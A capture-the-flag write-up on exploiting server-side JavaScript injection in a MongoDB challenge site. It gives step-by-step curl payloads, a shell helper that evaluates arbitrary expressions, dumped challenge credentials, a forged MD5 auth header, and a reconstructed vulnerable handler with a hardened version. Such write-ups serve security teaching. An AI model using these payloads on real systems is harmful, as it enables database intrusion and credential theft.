Tags: nosqli mongodb web 

Rating: 5.0

The web page states that the author is going to learn JS & SQL, so let's start with the JS the page loads:
```
$(document).ready(function() {
    // Every <img>, <p> and <h2> carries an id; the page fetches each
    // element's content from /get/<type>/<id> via XHR and fills it in.
    $("img").each(function() {
        var t = $(this),
            i = t.attr("id");
        $.get("/get/image/" + i, function(i) {
            t.attr("src", i)
        })
    }), $("p").each(function() {
        var t = $(this),
            i = t.attr("id");
        $.get("/get/text/" + i, function(i) {
            t.html(i)
        })
    });
    var j = '/admin_area'; // assigned but never used: a hidden endpoint
    $("h2").each(function() {
        var t = $(this),
            i = t.attr("id");
        $.get("/get/title/" + i, function(i) {
            t.html(i)
        })
    })
});
```
There are three kinds of XHR request, one per element type:
* /get/image/[id]
* /get/text/[id]
* /get/title/[id]

and one URL that is assigned to the unused variable `j` but never requested:
* /admin_area

First, probe the three XHR endpoints with a single quote:
> $ curl "http://206.189.54.119:5000/get/image/'"
>
> Not Found
>
> $ curl "http://206.189.54.119:5000/get/text/'"
>
> Not Found.
>
> $ curl "http://206.189.54.119:5000/get/title/'"
>
> Not Found.

Not exploitable? Take a closer look at the response headers with `-v`:
> $ curl -v "http://206.189.54.119:5000/get/image/'"
>
> < Application-Error: exception: SyntaxError: Unexpected token ILLEGAL
>
> Not Found

The single quote produced a JavaScript SyntaxError, so the parameter reaches a JS evaluator. Try a bare identifier instead:
> $ curl -v "http://206.189.54.119:5000/get/image/xxx"
>
> < Application-Error: exception: ReferenceError: xxx is not defined near 'x});return res;'
>
> Not Found

The error shows the code around the injection point: the id is pasted straight into JavaScript source that continues with `});return res;`. So close the call and the statement ourselves, return, and comment out the original tail with `//`. The space and the slashes are URL-encoded (`%20`, `%2F`) so the request still matches the `/get/image/[id]` route instead of being read as extra path segments, and `-g` stops curl from treating the braces as globs:
> $ curl -v -g "http://206.189.54.119:5000/get/image/1});return%20res;%2F%2F"
>
> < Application-Error: exception: SyntaxError: Unexpected end of input
>
> Not Found

"Unexpected end of input": our early `return` left the enclosing function unclosed. Add a `}` before the comment:
> $ curl -v -g "http://206.189.54.119:5000/get/image/1});return%20res;}%2F%2F"
>
> /images/sd4x_378x225.jpg

That works: the original query runs and the real image path comes back. Now return an object of our own instead of `res`:
> $ curl -v -g "http://206.189.54.119:5000/get/image/1});return{1:1};}%2F%2F"
>
> < Application-Error: Couln't find "picture_path" property in returning object from database.
>
> Not Found

The server expects a `picture_path` key in the returned object, so supply one:
> $ curl -v -g "http://206.189.54.119:5000/get/image/1});return{'picture_path':'hello'};}%2F%2F"
>
> hello
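
To make the mechanics concrete, here is an added example (my reconstruction, not the challenge's real server code) of the vulnerable pattern the leaked errors imply, with a hardened version beside it. The `images` collection, the `id` field, the `findOne` call and the `serverEval` emulation of the mongo shell context are assumptions; the payloads are the ones sent above, URL-decoded, and the one document in the fake database is constructed from the path the server returned.

```javascript
// Added example, not the challenge's server code: a reconstruction of the
// vulnerable pattern that the leaked errors imply ('});return res;' follows
// the id), next to a parameterized version immune to the same payloads.

// Constructed stand-in for the real database: a fake 'images' collection
// exposed through a mongo-shell-style `db` object.
const fakeDb = {
  images: {
    findOne(query) {
      const rows = [{ id: 1, picture_path: '/images/sd4x_378x225.jpg' }];
      return rows.find(r => r.id === query.id) || null;
    },
  },
};

// VULNERABLE (assumed shape): the route parameter is concatenated into
// JavaScript source. The text after the id is what the ReferenceError
// printed ("near 'x});return res;'") plus the function's closing brace.
function buildVulnerableCode(rawId) {
  return 'function(){var res = db.images.findOne({id:' + rawId + '});return res;}';
}

// Emulates a server-side eval of a function expression with `db` in scope,
// the way the site's mongo shell context behaves. The newline after the code
// is why a trailing '//' swallows only the original tail.
function serverEval(code, db) {
  return new Function('db', 'var f = ' + code + '\nreturn f(db);')(db);
}

function getImageVulnerable(rawId, db = fakeDb) {
  const doc = serverEval(buildVulnerableCode(rawId), db);
  if (!doc || !Object.prototype.hasOwnProperty.call(doc, 'picture_path')) {
    throw new Error('Couldn\'t find "picture_path" property in returning object from database.');
  }
  return doc.picture_path;
}

// HARDENED: validate the id as a canonical integer and pass it as a query
// value; no user-controlled text ever becomes code.
function getImageSafe(rawId, db = fakeDb) {
  if (!/^(0|[1-9][0-9]*)$/.test(rawId)) return null;
  const doc = db.images.findOne({ id: Number(rawId) });
  return doc && typeof doc.picture_path === 'string' ? doc.picture_path : null;
}

// Runs one decoded path segment through a handler and reports either the
// value or the error, much like the Application-Error header did.
function probe(handler, rawId) {
  try {
    return { ok: true, value: handler(rawId) };
  } catch (e) {
    return { ok: false, error: e.name + ': ' + e.message };
  }
}

// The payloads sent in the writeup, already URL-decoded (%20 -> ' ', %2F -> '/').
const payloads = [
  '1',
  "'",
  'xxx',
  '1});return res;//',
  '1});return res;}//',
  '1});return{1:1};}//',
  "1});return{'picture_path':'hello'};}//",
];

function demo() {
  for (const p of payloads) {
    console.log(JSON.stringify(p));
    console.log('  vulnerable:', probe(getImageVulnerable, p));
    console.log('  hardened:  ', probe(getImageSafe, p));
  }
}

demo();
```

Run it with `node` and compare each line against the curl sessions above: the quote yields a SyntaxError, the identifier a ReferenceError, the unclosed payload "Unexpected end of input", and the final payload returns `hello`, while the hardened handler returns `null` for everything that is not a plain integer.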

Injection succeeded, and whatever we put in `picture_path` is echoed back to us. Wrap that in a shell helper that returns `tojson()` of an arbitrary expression:
```
inject() {
    # $1: a JavaScript expression evaluated in the server's mongo shell context.
    # Its tojson() output comes back to us as the "picture_path" string.
    # -g stops curl from globbing the {} in the URL; keep $1 free of spaces
    # and slashes (or encode them as %20 and %2F) so the route still matches.
    curl -s -g "http://206.189.54.119:5000/get/image/1});return{'picture_path':tojson($1)}}%2F%2F"
}
inject this
```

Dumping `this` reveals pieces of the server-side shell state:
```
...
this._db = db;
...
"_mongo" : connection to EMBEDDED,
"db" : personal_site,
...
```

The site uses MongoDB, and the injected code is evaluated inside a mongo shell context with a live `db` handle, so we can enumerate the database:
```
inject 'db.getCollectionNames()'
```
> [
> "authentication",
> "contents",
> "credentials",
> "images",
> "system.indexes",
> "titles"
> ]
```
inject 'db.authentication.find({}).toArray()'
inject 'db.credentials.find({}).toArray()'
```
```
[
{
"_id" : ObjectId("5ae63ae0a86f623c83fecfb3"),
"id" : 1,
"method" : "post_data",
"format" : "username=[username]&password=[password]",
"activate" : "false"
},
{
"_id" : ObjectId("5ae63ae0a86f623c83fecfb4"),
"id" : 2,
"method" : "header",
"format" : "md5(se3cr3t|[username]|[password])",
"activate" : "true"
},
{
"_id" : ObjectId("5ae66f87dbf0b5383518fc3d"),
"id" : 50,
"activate" : false
}
]
```

and the `credentials` collection:
```
[
{
"_id" : ObjectId("5ae63ae0a86f623c83fecfb1"),
"id" : 1,
"username" : "administrator",
"password" : "H4rdP@ssw0rd?"
},
{
"_id" : ObjectId("5ae63ae0a86f623c83fecfb2"),
"id" : 2,
"username" : "user",
"password" : "epass"
}
]
```

With both the authentication method and the credentials in hand, try /admin_area:
> $ curl "http://206.189.54.119:5000/admin_area"
>
> authorization_token not found

Only one record in `authentication` is active (`"activate" : "true"`): method 2, a header whose value is `md5(se3cr3t|[username]|[password])`. With the administrator's credentials that is the MD5 of the literal string `se3cr3t|administrator|H4rdP@ssw0rd?` (hash the bare string, no trailing newline), sent in the `authorization_token` header the server asked for:
> $ curl "http://206.189.54.119:5000/admin_area" -H "authorization_token: 2cc348195dc1ab9842f9446b41ef650b"
>
> ASIS{3c266f6ccdaaef52eb4a9ab3abc2ca70}